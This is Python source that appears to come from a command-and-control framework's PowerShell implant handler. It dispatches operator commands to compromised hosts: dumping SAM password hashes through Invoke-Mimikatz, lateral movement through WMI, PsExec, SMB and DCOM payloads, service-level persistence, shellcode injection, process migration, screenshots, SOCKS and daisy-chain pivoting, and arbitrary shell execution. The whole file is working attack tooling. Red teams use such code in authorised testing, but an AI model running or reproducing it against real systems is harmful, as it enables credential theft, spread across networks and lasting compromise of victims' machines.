def do_hashdump(user, command, randomuri):
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
def do_invoke_daisychain(user, command, randomuri):
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command, urls), user, randomuri)
update_label("DaisyHost", randomuri)
print("Now use createdaisypayload")
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_invoke_runas(user, command, randomuri):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runas ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-runas %s" % params
new_task(cmd, user, randomuri)
def do_invoke_wmiexec(user, command, randomuri):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
params = re.compile("invoke-wmiexec ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s" % params
new_task(cmd, user, randomuri)
def handle_ps_command(command, user, randomuri, implant_id):
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print_bad("Error loading Stage2-Core.ps1: %s" % e)
# alias mapping
for alias in ps_alias:
if command.startswith(alias[0]):
command.replace(alias[0], alias[1])
command = command.strip()
run_autoloads(command, randomuri, user)
# opsec failures
for opsec in ps_opsec:
if opsec == command[:len(opsec)]:
print_bad("**OPSEC Warning**")
ri = input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
break
if command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("download-files "):
do_download_files(user, command, randomuri)
return
elif command.startswith("install-servicelevel-persistence"):
do_install_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("remove-servicelevel-persistence"):
do_remove_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("get-implantworkingdirectory"):
do_get_implantworkingdirectory(user, command, randomuri)
return
elif command.startswith("get-system"):
do_get_system(user, command, randomuri)
return
elif command.startswith("invoke-psexec ") or command.startswith("invoke-smbexec "):
do_invoke_psexec(user, command, randomuri)
return
elif command.startswith("invoke-psexecpayload "):
do_invoke_psexecpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmiexec "):
do_invoke_wmiexec(user, command, randomuri)
return
elif command.startswith("invoke-wmijspbindpayload "):
do_invoke_wmijspbindpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmijspayload "):
do_invoke_wmijspayload(user, command, randomuri)
return
elif command.startswith("invoke-wmipayload "):
do_invoke_wmipayload(user, command, randomuri)
return
elif command.startswith("invoke-dcompayload "):
do_invoke_dcompayload(user, command, randomuri)
return
elif command.startswith("invoke-runaspayload"):
do_invoke_runaspayload(user, command, randomuri)
return
elif command.startswith("invoke-runas "):
do_invoke_runas(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
elif command.startswith("get-pid"):
do_get_pid(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoudleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("pbind-loadmodule"):
do_pbind_loadmodule(user, command, randomuri)
return
elif command.startswith("invoke-daisychain"):
do_invoke_daisychain(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command == "listmodules":
do_listmodules(user, command, randomuri)
return
elif command == "modulesloaded":
do_modulesloaded(user, command, randomuri)
return
elif command == "ps":
do_ps(user, command, randomuri)
return
elif command == "get-screenshotmulti":
do_get_screenshotmulti(user, command, randomuri)
return
elif command == "get-powerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "get-screenshot":
do_get_screenshot(user, command, randomuri)
return
elif command == "hashdump":
do_hashdump(user, command, randomuri)
return
elif command == "loadpowerstatus":
do_loadpowerstatus(user, command, randomuri)
return
elif command == "stopdaisy":
do_stopdaisy(user, command, randomuri)
return
elif command == "stopsocks":
do_stopsocks(user, command, randomuri)
return
elif command == "sharpsocks":
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("get-rotation")):
do_get_rotation(user, command, randomuri)
return
elif command.startswith("reversedns"):
do_reversedns(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command.startswith("sharp") or command.startswith("run-exe") or command.startswith("run-dll"):
do_sharp(user, command, randomuri)
return
else:
if command:
do_shell(user, command, randomuri)
return